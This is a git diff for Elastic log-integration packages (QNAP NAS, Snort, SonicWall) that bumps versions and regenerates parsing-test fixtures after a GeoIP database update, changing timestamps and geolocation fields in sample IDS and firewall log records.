@@ -799,7 +799,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383744427Z", + "ingested": "2021-12-14T14:54:31.222792504Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Deleted user \"test\".", "provider": "event-log", "timezone": "-05:00", diff --git a/packages/qnap_nas/manifest.yml b/packages/qnap_nas/manifest.yml index d4780b597be..ed16612908e 100644 --- a/packages/qnap_nas/manifest.yml +++ b/packages/qnap_nas/manifest.yml @@ -1,6 +1,6 @@ name: qnap_nas title: QNAP NAS -version: 1.0.0 +version: 1.0.1 release: ga description: Collect logs from QNAP NAS devices with Elastic Agent. type: integration diff --git a/packages/snort/changelog.yml b/packages/snort/changelog.yml index 5ebf92e3a4a..2759ee49740 100644 --- a/packages/snort/changelog.yml +++ b/packages/snort/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json index 14b4a192b88..8d82d4fc780 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json 
@@ -43,7 +43,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094036100Z", + "ingested": "2021-12-14T14:54:33.351280142Z", "original": "09/04-21:45:37.536335 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0DFC,0xBC763516,,0x80C,127,0,55665,100,102400,,,,", "category": [ "network" @@ -117,7 +117,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094040500Z", + "ingested": "2021-12-14T14:54:33.351282978Z", "original": "09/04-21:45:37.553882 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0E38,0xBC763552,,0x80C,127,0,55666,100,102400,,,,", "category": [ "network" @@ -191,7 +191,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094047600Z", + "ingested": "2021-12-14T14:54:33.351283476Z", "original": "09/04-21:50:40.017935 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,,", "category": [ "network" @@ -262,7 +262,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094054900Z", + "ingested": "2021-12-14T14:54:33.351283859Z", "original": "09/04-21:50:39.947383 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55333,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xB1,,,,,,64,0,26112,163,166912,,,,", "category": [ "network" @@ -333,7 +333,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094060Z", + "ingested": "2021-12-14T14:54:33.351284253Z", "original": "09/04-21:50:40.666095 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.75,55776,10.100.10.255,32414,00:0C:29:B8:43:CE,FF:FF:FF:FF:FF:FF,0x3F,,,,,,64,0,37712,49,50176,,,,", "category": [ "network" 
@@ -365,19 +365,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -419,7 +414,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094065100Z", + "ingested": "2021-12-14T14:54:33.351284624Z", "original": "09/04-21:49:55.900215 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1", "category": [ "network" @@ -467,19 +462,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -511,7 +501,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094070200Z", + "ingested": "2021-12-14T14:54:33.351285021Z", "original": "09/04-21:49:55.911592 ,1,1000004,0,\"Pinging...\",ICMP,175.16.199.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1", "category": [ "network" 
@@ -549,19 +539,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -603,7 +588,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094076700Z", + "ingested": "2021-12-14T14:54:33.351285402Z", "original": "09/04-21:49:56.900997 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2", "category": [ "network" diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json index 993e55a0bef..d53551b9e07 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json @@ -43,7 +43,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150056700Z", + "ingested": "2021-12-14T14:54:34.293923694Z", "original": "05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -\u003e 255.255.255.255:67", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", 
@@ -60,19 +60,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -116,7 +111,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150067100Z", + "ingested": "2021-12-14T14:54:34.293925998Z", "original": "05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -\u003e 175.16.199.1:53", "timezone": "America/Chicago", "created": "2021-05-30T19:09:28.472-05:00", @@ -133,19 +128,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -159,19 +149,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -202,7 +187,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:49.150073400Z", + "ingested": "2021-12-14T14:54:34.293926449Z", "original": "05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", @@ -219,19 +204,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -275,7 +255,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:49.150079300Z", + "ingested": "2021-12-14T14:54:34.293926849Z", "original": "12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -\u003e 175.16.199.1:1900", "timezone": "America/Chicago", "created": "2021-12-30T14:09:21.116-06:00", @@ -303,19 +283,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -348,7 +323,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:49.150085500Z", + "ingested": "2021-12-14T14:54:34.293927247Z", "original": "01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -\u003e 192.168.115.10:1051", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.327-06:00", @@ -375,19 +350,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -419,7 +389,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:49.150092Z", + "ingested": "2021-12-14T14:54:34.293927632Z", "original": "01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -\u003e 192.168.115.10", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.208-06:00", @@ -447,19 +417,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -492,7 +457,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:49.150098100Z", + "ingested": "2021-12-14T14:54:34.293928007Z", "original": "09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:54757", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.041-05:00", @@ -520,19 +485,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -565,7 +525,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:49.150103900Z", + "ingested": "2021-12-14T14:54:34.293928419Z", "original": "09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:36312", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.118-05:00", @@ -582,19 +542,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -636,7 +591,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150110Z", + "ingested": "2021-12-14T14:54:34.293928798Z", "original": "09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.216-05:00", @@ -663,19 +618,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -707,7 +657,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150116Z", + "ingested": "2021-12-14T14:54:34.293929172Z", "original": "09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 175.16.199.1 -\u003e 10.100.10.190", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.227-05:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json index ee6ae8b00df..72ead5b91ae 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json 
@@ -42,7 +42,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:50.388577300Z", + "ingested": "2021-12-14T14:54:35.512406786Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.860730 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53730 IpLen:20 DgmLen:108 DF\n***AP*** Seq: 0x688E00E4 Ack: 0xBC730BB6 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.860-05:00", @@ -107,7 +107,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:50.388585300Z", + "ingested": "2021-12-14T14:54:35.512409539Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.903092 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53731 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x688E0128 Ack: 0xBC730C02 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.903-05:00", @@ -173,7 +173,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:50.388590600Z", + "ingested": "2021-12-14T14:54:35.512410045Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.299702 10.100.10.1:53 -\u003e 10.100.10.190:36635\nUDP TTL:64 TOS:0x0 ID:58363 IpLen:20 DgmLen:83\nLen: 55\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", @@ -202,19 +202,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -256,7 +251,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:50.388595300Z", + "ingested": "2021-12-14T14:54:35.512410487Z", "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.299988 10.100.10.190 -\u003e 175.16.199.1\nICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF\nType:8 Code:0 ID:101 Seq:1 ECHO\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", @@ -328,7 +323,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:50.388633200Z", + "ingested": "2021-12-14T14:54:35.512410899Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Classification: Potentially Bad Traffic] [Priority: 2] \n09/04-21:53:15.301504 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:61472 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x68940D74 Ack: 0xBC811F16 Win: 0x80E TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.301-05:00", @@ -365,19 +360,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -409,7 +399,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:50.388660400Z", + "ingested": "2021-12-14T14:54:35.512411318Z", "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.309468 175.16.199.1 -\u003e 10.100.10.190\nICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84\nType:0 Code:0 ID:101 Seq:1 ECHO REPLY\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.309-05:00", 
@@ -480,7 +470,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:50.388681Z", + "ingested": "2021-12-14T14:54:35.512411741Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.358155 10.100.10.1:53 -\u003e 10.100.10.190:56012\nUDP TTL:64 TOS:0x0 ID:33955 IpLen:20 DgmLen:153\nLen: 125", "timezone": "-05:00", "created": "2021-09-04T21:53:15.358-05:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json index a707d940347..e640891cdff 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json @@ -4,19 +4,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -32,19 +27,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -76,7 +66,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:51.135040700Z", + "ingested": "2021-12-14T14:54:36.302057808Z", "original": "09/03/21-12:37:16.428952 ,1,2403488,68499,\"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95\",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:37:16.428-06:00", @@ -99,19 +89,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -127,19 +112,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -171,7 +151,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:51.135050100Z", + "ingested": "2021-12-14T14:54:36.302060911Z", "original": "09/03/21-12:56:44.310212 ,1,2011716,4,\"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)\",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:56:44.310-06:00", 
@@ -194,19 +174,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -221,19 +196,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -264,7 +234,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:51.135058700Z", + "ingested": "2021-12-14T14:54:36.302061490Z", "original": "09/03/21-16:29:03.494387 ,1,477,3,\"ICMP Packet\",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T16:29:03.494-06:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json index ea2b979c40d..f651f9d02b8 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json 
@@ -47,7 +47,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:51.600089400Z", + "ingested": "2021-12-14T14:54:36.775944022Z", "original": "Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -\u003e 10.25.10.22:32414", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -106,7 +106,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:51.600098200Z", + "ingested": "2021-12-14T14:54:36.775946472Z", "original": "Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -\u003e 10.50.10.190:22", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -126,19 +126,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -181,7 +176,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:51.600104Z", + "ingested": "2021-12-14T14:54:36.775946913Z", "original": "Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-05T16:02:55.000-05:00", diff --git a/packages/snort/manifest.yml b/packages/snort/manifest.yml index 1206d23f2cc..26c08bebc45 100644 --- a/packages/snort/manifest.yml +++ b/packages/snort/manifest.yml @@ -1,6 +1,6 @@ name: snort title: Snort -version: 0.1.1 +version: 0.1.2 release: experimental description: Collect logs from Snort with Elastic Agent. type: integration 
diff --git a/packages/sonicwall/changelog.yml b/packages/sonicwall/changelog.yml index 86c6e063c9d..837b4ed2b29 100644 --- a/packages/sonicwall/changelog.yml +++ b/packages/sonicwall/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json index 414d415a4ea..b517cb3e688 100644 --- a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json +++ b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json 
@@ -1,252 +1,252 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:06\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23419 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557766200Z" + "ingested": "2021-12-14T14:54:38.285969322Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=7 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN", "event": { - "ingested": "2021-06-09T13:23:15.557789Z" + "ingested": "2021-12-14T14:54:38.285972048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23420 src=2.2.2.2:36702:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557796600Z" + "ingested": "2021-12-14T14:54:38.285972649Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567996 src=192.168.4.10:27577:WAN 